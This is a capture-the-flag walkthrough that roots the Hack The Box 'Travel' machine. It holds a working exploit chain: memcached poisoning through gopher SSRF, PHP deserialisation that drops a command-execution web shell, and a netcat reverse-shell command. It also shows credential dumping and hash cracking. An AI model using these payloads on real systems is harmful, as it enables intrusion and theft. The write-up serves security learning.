In this write-up I will root the Travel machine hosted by Hack The Box. The machine is very realistic. It requires you do to a good enumeration as well as some custom exploitation.

It is a hard linux based box by xct and jkr which was released on May 16, 2020.

This machine has been rooted in collaboration with my team member eightdot.

Reconnaissance

The IP address of the box is 10.10.10.189. Lets run a few Nmap scans.

nmap -p- -oA quick 10.10.10.189 &&
nmap -p- -A -oA full 10.10.10.189

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 21:33 CEST
Nmap scan report for travel.htb (10.10.10.189)
Host is up (0.018s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds

(...)

This quick scan reveals our machine appears to be a web server. Let’s take a quick look at these pages. Navigating to http://10.10.10.189 shows us a countdown timer. Apparently they plan to have their website in development for over 2 years. Navigating to https://10.10.10.189 tells us they are still struggling with implementing multiple domains properly. This is where we learn there are multiple sites hosted on this machine. Let’s inspect the certificate. The ‘Certificate Subject Alt Name’ reveals the following:

  • www.travel.htb
  • blog.travel.htb
  • blog-dev.travel.htb

Meanwhile, the full Nmap scan which has been completed now. Lets examine the results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 21:59 CEST
Nmap scan report for travel.htb (10.10.10.189)
Host is up (0.016s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open  ssl/http nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after:  2030-04-21T19:24:29
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

The full scan confirmed my findings. To be able to browse to these websites we need to add them to our hosts file.

sudo nano /etc/hosts

(...)
10.10.10.189    travel.htb
10.10.10.189    blog.travel.htb
10.10.10.189    blog-dev.travel.htb
10.10.10.189    www.travel.htb

A quick check with searchsploit gave no known vulnerabilities for these service versions. They are also pretty up-to-date so I skip finding common vulnerabilities from other sources for now. Let’s just start a few quick Nikto scans for these websites in the background, then take a look at those websites with our browser.

nikto -host http://travel.htb -output nikto_travel_htb.txt &&
nikto -host http://blog.travel.htb -output nikto_blog_travel_htb.txt && 
nikto -host http://blog-dev.travel.htb -output nikto_blog_dev_travel_htb.txt

The www.travel.htb page is the same as travel.htb we had already seen. The http://blog-dev.travel.htb returns a 403 Forbidden. http://blog.travel.htb presents us with a WordPress blog. The first article mentions they have a fresh new RSS feature from their blog-dev team. Interesting! let’s focus on the blog for now while we wait for nikto to complete.

Awesome RSS

When examining the sources of the blog page, I find the following:

/* I am really not sure how to include a custom CSS file
 * in worpress. I am including it directly via Additional CSS for now.
 * TODO: Fixme when copying from -dev to -prod. */

@import url(http://blog-dev.travel.htb/wp-content/uploads/2020/04/custom-css-version#01.css);

Obviously, this import won’t work because of the # character. We do learn they have copied over this website from their development environment. We also learn they forgot about the tasks on their TO-DO list :-). The URL still links to blog-dev instead of blog.

Let’s take a look at this Awesome RSS page they have mentioned.

When viewing the source, this caught my eyes. Apparently this page supports some sort of debug output.

<!--
DEBUG
-->

Let’s do an educated guess and pass a debug parameter to the query string.

curl http://blog.travel.htb/awesome-rss/?debug
<!--
DEBUG
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
-->

Check. So some sort of debug information will be written here. Not sure why it does not show anything at the moment. Meanwhile, the Nikto scans have completed.

A Git repository

For travel.htb nothing interesting has been found. For blog.travel.htb it confirmed the WordPress installation. it also mentions robots.txt which just contains the wp-admin folder.

blog-dev.travel.htb is where things get interesting. It appears they forgot to remove their .git folder from the development machine. Lets confirm by peeking at the HEAD. We have now identified the user jane.

+ OSVDB-3092: GET /.git/index: Git Index file may contain directory listing information.
+ GET /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ GET /.git/config: Git config file found. Infos about repo details may be present.
curl http://blog-dev.travel.htb/.git/logs/HEAD

0000000000000000000000000000000000000000 0313850ae948d71767aff2cc8cc0f87a0feeef63 jane <jane@travel.htb> 1587458094 -0700       commit (initial): moved to git

I run a wpscan in the background to take a look at the WordPress installation while we investigate the repository,

wpscan --url http://blog.travel.htb -e -o wpscan_blog

There is a popular tool set called GitTools that we can use to dump the Git repository to our local system. First, clone the sources from GitHub. Then we run the dumper to download the repository from the website. Then we use the extractor to get all files found in the repository.

git clone https://github.com/internetwache/GitTools.git
./GitTools/Dumper/gitdumper.sh http://blog-dev.travel.htb/.git/ ./gitdump
./GitTools/Extractor/extractor.sh ./gitdump/ ./gitdump/
ls -R ./gitdump/

(...)
./gitdump/0-0313850ae948d71767aff2cc8cc0f87a0feeef63:
commit-meta.txt  README.md  rss_template.php  template.php

We have retrieved four files. Let’s take a look at README.md

# Rss Template Extension

Allows rss-feeds to be shown on a custom wordpress page.

## Setup

* `git clone https://github.com/WordPress/WordPress.git`
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty` 
* create logs directory in `wp-content/themes/twentytwenty` 
* create page in backend and choose rss_template.php as theme

## Changelog

- temporarily disabled cache compression
- added additional security checks 
- added caching
- added rss template

## ToDo

- finish logging implementation

These appear to be the sources for their Awesome RSS page. We learn a few things here. First of all we learn the included .php files have been copied over to the twentytwenty theme folder. Second, there appears to be a logs directory. They also mention they implemented a cache without compression. Finally, another to-do which has probably not been implemented. Let’s take a look at the logs folder to confirm. Unfortunately curl http://blog.travel.htb/wp-content/themes/twentytwenty/logs gives us a 301 response.

Awesome RSS sources

We should take a look at those sources. As rss_template.php is the configured theme, I’ll start with that file.

// rss_template.php:5
include('template.php');

// rss_template.php:16
$simplepie = new SimplePie();
$simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');

// rss_template:php:34
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
    $tmp = (explode("=", $url)); 	
    $url = end($tmp); 	
} else {
    $url = "http://www.travel.htb/newsfeed/customfeed.xml";
}

// rss_template.php:100
<!--
DEBUG
<?php
if (isset($_GET['debug'])){
  include('debug.php');
}
?>
-->

We learn a few interesting things here. They are using a library SimplePie to load the feed http://www.travel.htb/newsfeed/customfeed.xml for which the URL can be overridden using the custom_feed_url query string parameter. The also use memcache to cache feeds. Finally, we learn the debug output is served by another file called debug.php which is not part of our git commit. Using curl we confirm this is indeed the debug output.

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

Let’s take a look at template.php

<?php

/**
 Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
	// this should be secure
	$tmpUrl = urldecode($url);
	if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
	{		
		die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
	}
	if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
	{		
		die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
	}
	$tmp = parse_url($url, PHP_URL_HOST);
	// preventing all localhost access
	if($tmp == "localhost" or $tmp == "127.0.0.1")
	{		
		die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");		
	}
	return $url;
}

function url_get_contents ($url) {
    $url = safe($url);
	$url = escapeshellarg($url);
	$pl = "curl ".$url;
	$output = shell_exec($pl);
    return $output;
}


class TemplateHelper
{

    private $file;
    private $data;

    public function __construct(string $file, string $data)
    {
    	$this->init($file, $data);
    }

    public function __wakeup()
    {
    	$this->init($this->file, $this->data);
    }

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

The safe function appears to be a simple Web Application Firewall (WAF) method. They try to detect Local File Inclusion(LFI), command execution and Server Side Request Forgery (SSRF).

The url_get_contents function retrieves the feed using curl. This might be an interesting attack vector.

The TemplateHelper class appears to be unused. It is supposed to write data to the logs folder. The README.md mentioned logging is on their TO-DO list.

The __wakeup() method caught my attention. This is a method called when an object is deserialized by PHP. This is a bit odd for a Template Helper or logger class.

A few rabbit holes

I did a few attempts that turned out to be rabbit holes. First I felt like attacking curl was the way to go. I grabbed a simple python script from the web that writes the body of POST requests to disk. Then I came up with -X POST -T /etc/passwd http://10.10.14.32:8000/store.json command that would do a LFI with curl that will not be detected by the safe method. Unfortunately it did not work. I tried other files as well like debug.php without success.

I was a bit surprised it did not work. After examining the code a bit I noticed the custom_feed_url value is passed directly to CURL without any decoding. The safe method does invoke $tmpUrl = urldecode($url); however the $tmpUrl gets discarded as the code just returns $url again.

However, rss_template.php:19 does pass the URL to SimplePie. Here I felt like I could try to do LFI with XML. I wrote a valid RSS XML file that would include local files in the title of an item.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=debug.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<item>
<title>&xxe;</title>
<link>http://blog.travel.htb/awesome-rss/</link>
<guid>http://blog.travel.htb/awesome-rss/</guid>
<pubDate>Mon, 30 Sep 2019 08:20:05 -0500</pubDate>
<description><![CDATA[This is just some blog entry]]></description>
<media:thumbnail xmlns:media="http://search.yahoo.com/mrss/"  url="http://ezinearticles.com/members/mem_pics/Tracey-A-Bell_1277621.jpg"  width="150"  height="150" />
</item>
</channel>
</rss>

Whether curl was vulnerable for this does not matter. After staring at an empty title for a while I remembered the following lines:

// rss_template.php:18

//$simplepie->set_raw_data($data);
$simplepie->set_feed_url($url);

The curl data is being discarded. SimplePie itself is responsible for downloading the feed. Unfortunately, SimplePie is not vulnerable for this exploit.

Exploiting Memcache

After refreshing the blog page, I noticed the following in the debug output:

 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_4e5612ba07(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

This looks liked trimmed data. On the left hand we find a xct_ prefix. On the right hand the first characters of what seems to be a PHP serialized object. Because SimplePie uses caching and they intend to do some sort of serializable logging using TemplateHelper. I suspect this is the cached feed. Lets confirm my suspicion. I restarted the web server and hosted a valid RSS XML document.

The first time navigation to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml resulted in two requests. however, the second time I only get one request.

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.189 - - [23/May/2020 14:41:47] "GET /a.xml HTTP/1.1" 200 -
10.10.10.189 - - [23/May/2020 14:41:47] "GET /a.xml HTTP/1.1" 200 -
10.10.10.189 - - [23/May/2020 14:42:29] "GET /a.xml HTTP/1.1" 200 -

The first time, debug.php gave no output. The second time, it gave the following:

 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

I have confirmed debug.php shows the cached data. The first thing I noticed is that with my custom_feed_url override the identifier has changed. So, it looks like feeds are cached per request URL. Let’s try to find the full identifier.

echo "http://10.10.14.4:8000/a.xml" | md5sum
c1d91021748bc8a2d5f13fc29923396a  -

Unfortunately the identifier is no simple MD5 hash of the URL. WordPress and SimplePie are open source software. SimplePie is included in the sources of WordPress. So, let’s take a look at the sources. The README.md shows the sources they have used for the blog.

Note: Because I refer to a lot of files and line numbers, you can use git checkout to view the same version I have used.

git clone https://github.com/WordPress/WordPress.git
git checkout b9751d4efeb03bfe9bd8f537b2d7524d24ffd7dc

Let’s take a look at /wp-includes/class-simplepie.php mentioned in rss_template.php first.

// /wp-includes/class-simplepie.php:6
require ABSPATH . WPINC . '/SimplePie/Cache.php';

// /wp-includes/class-simplepie.php:1157
public function set_cache_name_function($function = 'md5')
{
    // (...)
}

// /wp-includes/class-simplepie.php:1412
$cache = $this->registry->call('Cache', 'get_handler', array($this->cache_location, call_user_func($this->cache_name_function, $url), 'spc'));

// /wp-includes/SimplePie/Cache.php:65
'memcache'  => 'SimplePie_Cache_Memcache',

// /wp-includes/SimplePie/Cache/Memcache.php:99
$this->name = $this->options['extras']['prefix'] . md5("$name:$type");

When examining the files above we learn that the identifier for the cache is xct_md5(md5($url):spc). Let’s compare my identifier with the debug output

echo -ne "http://10.10.14.4:8000/a.xml" | md5sum | awk '{printf "%s:spc", $1}'| md5sum
39f94aaab0184ded53c3b0a0e5168391  -

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

So when browsing to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml we fetch data from the xct_39f94aaab0184ded53c3b0a0e5168391 record.

We also know uses PHP deserialization to read the cached data. This means we can use PHP object Injection if we are able to inject our own serialized object into the cache.

Google’s first hit for ‘SSRF memcache’ is SSRF - Memcached and other key value injections in the wild where the author refers to his ‘The New Page of Injections Book: Memcached Injections’ presentation. This is a nice but optional read.

Building the exploit

The command that we want to execute is setting a new value for a record identified with xct_39f94aaab0184ded53c3b0a0e5168391.

First we want to know whether we can write to the cache correctly. We will insert a test value and check whether it has been written to the cache by navigating to debug.php.

One can communicate with Memcached using a simple text protocol.

The command we want to run is:

set xct_39f94aaab0184ded53c3b0a0e5168391 0 0 4
test

Where ‘4’ represents the length of the payload (test) in bytes.

We only need to find a way to send simple text commands to this service.

The HackTricks GitBook has a nice topic on Server Side Request Forgery (SSRF). When looking for a way to pass my command using cURL, I found the Gopher:// scheme on their page.

Using this protocol you can specify the IP, port and bytes you want the listener to send. Then, you can basically exploit a SSRF to communicate with any TCP server

Gopher is documented in RFC 1436. When giving this a quick scan it appears it is indeed a simple text based protocol. Therefore, when using the gopher schema, cURL will simply send your path as a command to Memcached.

However, we do need to bypass the safe method. It blocks our request to 127.0.0.1 so we use its decimal notation 2130706433.

Second, we need to manually URL encode the command. We cannot use cURL’s --data-urlencode flag because that would also encode gopher:// when is becomes part of the value of custom_feed_url.

I will test whether cURL sends the command correctly by connecting it to local host.

curl gopher://2130706433:11211/set%20xct_ad4f41d5d7e37ed13dbf4200a78e3ac0%200%200%204%0Atest
nc -nvlp 11211
listening on [any] 11211 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 45148
et xct_39f94aaab0184ded53c3b0a0e5168391 0 0 4 test

As we can see, for some reason the first character is lost. So, for the actual payload we’ll prefix the command with a dummy a character.

curl http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/aset%20xct_39f94aaab0184ded53c3b0a0e5168391%200%200%204%0Atest

Lets verify whether our test has been written into the cache by taking a look at the debug.php page.

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | test |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

We confirmed we can write to the cache. now we need to do our PHP object injection.

The TemplateHelper comes to the rescue. Basically, it writes some text to some file in the logs folder when being deserialized. I would like to write a shell.php file containing the following code that allows us to to some remote command execution (RCE).

<?php
echo($_GET['cmd']);
system($_GET['cmd']);
?>

I serialized this into a TemplateHelper instance using this code:

<?php
class TemplateHelper
{
    // {...}
}

$identifier = "xct_39f94aaab0184ded53c3b0a0e5168391";
$filename = "shell.php";

// Create a new TemplateHelper instance loaded with our malicious code
$body = file_get_contents($filename);
$helper = new TemplateHelper($filename,$body);

// Serialize the instance
$helper_serialized = serialize($helper);
$helper_serialized_length = strlen($helper_serialized);

// Create an URL to inject our malicious code
$helper_serialized_urlencoded = urlencode($helper_serialized);
$request_url = "http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=gopher://2130706433:11211/aset%20"
    . $identifier
    . "%200%200%20"
    . (string)$helper_serialized_length
    . "%0d%0a"
    . $helper_serialized_urlencoded
    . "\r\n";

print($request_url);
?>

Let’s run this script using the PHP CLI to build our request URL.

php generate.php
http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=gopher://2130706433:11211/aset%20xct_39f94aaab0184ded53c3b0a0e5168391%200%200%20156%0d%0aO%3A14%3A%22TemplateHelper%22%3A2%3A%7Bs%3A20%3A%22%00TemplateHelper%00file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A20%3A%22%00TemplateHelper%00data%22%3Bs%3A50%3A%22%3C%3Fphp%0Aecho%28%24_GET%5B%27cmd%27%5D%29%3B%0Asystem%28%24_GET%5B%27cmd%27%5D%29%3B%0A%3F%3E%22%3B%7D

Running the exploit

First, we need to inject our code into the cache. To do this, navigate with your browser to the generated URL.

Second, we need to run the TemplateHelper by retrieving it from the cache and deserialize it. To do this navigate to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml. It will write our shell.php to the logs folder.

// todo: change navigate to curl, test whether this works for both step 1 and 2.

Third, lets run some commands. We have Remote Code Execution (RCE)!!

curl -G --data-urlencode "cmd=cat /etc/passwd" http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

Let try to get an fully interactive shell. I’ll start with the basic NC solution. Do note the cache expires after 60 seconds. There also appears to be a cleanup script that clears the logs folder.

Run this command: nc 10.10.14.4 4444 -e /bin/sh after you started your local NC listener as below.

curl -G --data-urlencode "cmd=nc 10.10.14.4 4444 -e /bin/sh" http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

After a connection, upgrade your shell using script -qc /bin/bash /dev/null

nc -nvlp 4444
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.189] 57316
script -qc /bin/bash /dev/null
www-data@blog:/var/www/html/wp-content/themes/twentytwenty/logs$ 

Then use CTRL+Z to background the NC listener and run stty raw -echo. Then foreground the NC listener with fg. Finally run reset and provide xterm as terminal type. You will be presented with a new clean fully interactive shell.

www-data

So, we have a fully interactive shell as the www-data user. Let’s run our initial enumeration. On your attack machine, start a web server to host the Linux Smart Enumeration script.

wget wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
python3 -m http.server

On the remote shell, navigate to a temp folder and start our enumeration script.

mkdir /tmp/.myrtle
cd /tmp/.myrtle
curl http://10.10.14.4:8000/lse.sh > lse.sh
chmod +x lse.sh
./lse.sh -l1

When reviewing the output, the following lines caught my attention:

[*] net000 Services listening only on localhost............................ yes!
---
tcp     LISTEN   0        80             127.0.0.1:3306           0.0.0.0:*     
tcp     LISTEN   0        1024           127.0.0.1:11211          0.0.0.0:*     
---
[!] fst190 Can we read any backup?......................................... yes!
---
-rw-r--r-- 1 root root 1190388 Apr 24 06:39 /opt/wordpress/backup-13-04-2020.sql
---
[*] ctn000 Are we in a docker container?................................... yes!

Apparently we are jailed inside a docker container that is running Memcached as well as a database server.

First, lets fetch the database credentials from the WordPress configuration file to take a look at the current database.

www-data@blog:/var/www/html$ cat /var/www/html/wp-config.php
<?php
(...)
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );
define( 'DB_HOST', '127.0.0.1' );
(...)

The Database

Let’s take a look at the present databases. It could be there is another database present.

mysql -u wp -p
Enter password: 
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wp                 |
+--------------------+

Just some default databases and the WordPress database are present. Let’s dive into wp.

MariaDB [(none)]> USE wp;
Database changed
MariaDB [wp]>

First, we should take a look at all the tables present.

MariaDB [wp]> SHOW TABLES;
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

Let’s take a look at wp_users. We might find some usernames. In addition, they may have reused their passwords. Using SHOW COLUMNS FROM wp_users; I was able to determine the columns I want to see.

MariaDB [wp]> SELECT user_login, user_pass FROM wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/ |
+------------+------------------------------------+

Using this same technique, I explored other interesting tables like wp_posts and wp_comments but found nothing interesting. You can exit the SQL shell using exit.

The Database backup

Let’s take a look at the database backup. Our enumeration mentioned /opt/wordpress/backup-13-04-2020.sql. Let’s take a manual look at the wp_users table first. I will be using cat and more to quickly find the insert statement we need using the ```wp_users VALUES` regular expression.

cat /opt/wordpress/backup-13-04-2020.sql | more
/ `wp_users` VALUES
...skipping
INSERT INTO `wp_users` VALUES (1,'admin','$P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/','admin','admin@travel.htb','http://localhost','2020-04-13 13:19:01','',0,'admin'),(2,'lynik-admin','$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.','lynik-admin','lynik@travel.htb','','2020-04-13 13:36:18','',0,'Lynik Schmidt');

We now have an additional user: lynik-admin:$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc. . It is noteworthy that an administrator user has been removed.

If these passwords are supposed to be cracked, we should be able to find them in rockyou.txt.

echo "\$P\$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc." > hash

Let’s find the correct mode for hashcat using hashcat -h. I extracted the relevant lines for readability.

hashcat -h
hashcat - advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, see references below                      | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3

- [ Hash modes ] -

      # | Name                                             | Category
  ======+==================================================+======================================
    400 | WordPress (MD5)                                  | Forums, CMS, E-Commerce, Frameworks


- [ Attack Modes ] -

  # | Mode
 ===+======
  0 | Straight

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict

Basically, the first example is exactly what we need.

hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
(...)
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser 
(...)

SSH credentials

We have found the user credentials lynik-admin:1stepcloser. Lets check whether we can get SSH access. That is a great way to escape the docker container.

ssh lynik-admin@travel.htb
lynik-admin@travel.htb's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

lynik-admin@travel:~$ 

Great, we have shell! Now let’s take take a look.

lynik-admin@travel:~$ ls -l
total 4
-r--r--r-- 1 root root 33 May 24 09:16 user.txt

lynik-admin

We managed to escape from www-data and the Docker container. We are now logged in as lynik-admin. Let’s take a look at the user’s home folder before we start enumeration scripts. A few files caught my attention:

ls -la
-rw-r--r-- 1 lynik-admin lynik-admin   82 Apr 23 19:35 .ldaprc
-rw------- 1 lynik-admin lynik-admin  861 Apr 23 19:35 .viminfo

.ldaprc is a configuration file to be applied when running Lightweight Directory Access Protocol (LDAP) clients. So there is probably an LDAP server running on this machine.

.viminfois a cache file for the Vim editor. It remembers the history from the last session which enables you to continue where you left off when reopening that file.

cat .ldaprc 
HOST ldap.travel.htb
BASE dc=travel,dc=htb
BINDDN cn=lynik-admin,dc=travel,dc=htb

These appear to be defaults to use when performing LDAP operations. Let’s take a look at the .viminfo file. It might have changed these properties.

cat .viminfo
# Registers:
""1     LINE    0
        BINDPW Theroadlesstraveled
|3,1,1,1,1,0,1587670528,"BINDPW Theroadlesstraveled"

# File marks:
'0  3  0  ~/.ldaprc
|4,48,3,0,1587670530,"~/.ldaprc"

So, although this syntax might appear a bit obscure, it is safe to assume they have removed BINDPW Theroadlesstraveled from the .ldaprc file. Unfortunately the VIM history is still present.

  • HOST: Specifies the name(s) of an LDAP server(s) to which the LDAP library should connect.
  • BASE: Specifies the default base DN to use when performing LDAP operations. The base must be specified as a Distinguished Name in LDAP format.
  • BINDDN: Specifies the default bind DN to use when performing LDAP operations. The bind DN must be specified as a Distinguished Name in LDAP format.
  • BINDPW: The password used when binding to the LDAP server (if BINDDN was defined).

I did not to add BINDPW back to this file, as it would spoil this step for other hackers.

I decided to learn a bit about the LDAP protocol as it is a bit hard to understand without the basics. I found the OpenLDAP’s Introduction to OpenLDAP Directory Services pretty useful.

Exploring LDAP

Using TAB completion I learned about the amount of tools present on this machine.

lynik-admin@travel:~$ ldap
ldapadd      ldapcompare  ldapdelete   ldapexop     ldapmodify   ldapmodrdn   ldappasswd   ldapsearch   ldapurl      ldapwhoami

First let’s find out who we are. ldapwhoami sounds suitable for this job.

lynik-admin@travel:~$ ldapwhoami
SASL/SCRAM-SHA-1 authentication started
Please enter your password: 
ldap_sasl_interactive_bind_s: Invalid credentials (49)
        additional info: SASL(-13): user not found: no secret in database

Apparently my credentials are invalid. Let’s take a look at the documentation. I show the relevant information.

NAME
       ldapwhoami - LDAP who am i? tool
       
OPTIONS
       -x     Use simple authentication instead of SASL.

       -D binddn
              Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.
              
       -w passwd
              Use passwd as the password for simple authentication.              

To summarize, to use BINDDN we need to use simple authentication. using -W we can provide the missing password.

lynik-admin@travel:~$ ldapwhoami -x -w Theroadlesstraveled
dn:cn=lynik-admin,dc=travel,dc=htb

Great, so we were able to authenticate to the LDAP server and get our DN. Let’s find out what else is in this directory. Upon inspecting man ldapsearch the authentication flags are the same. I left out a lot of users and DC’s for readability.

lynik-admin@travel:~$ ldapsearch -x -w Theroadlesstraveled
# extended LDIF
#
# LDAPv3
# base <dc=travel,dc=htb> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lynik-admin, travel.htb
dn: cn=lynik-admin,dc=travel,dc=htb
description: LDAP administrator
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: lynik-admin
userPassword:: e1NTSEF9MEpaelF3blZJNEZrcXRUa3pRWUxVY3ZkN1NwRjFRYkRjVFJta3c9PQ=
 =

# lynik, users, linux, servers, travel.htb
dn: uid=lynik,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: lynik
uidNumber: 5000
homeDirectory: /home/lynik
givenName: Lynik
gidNumber: 5000
sn: Schmidt
cn: Lynik Schmidt
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

# gloria, users, linux, servers, travel.htb
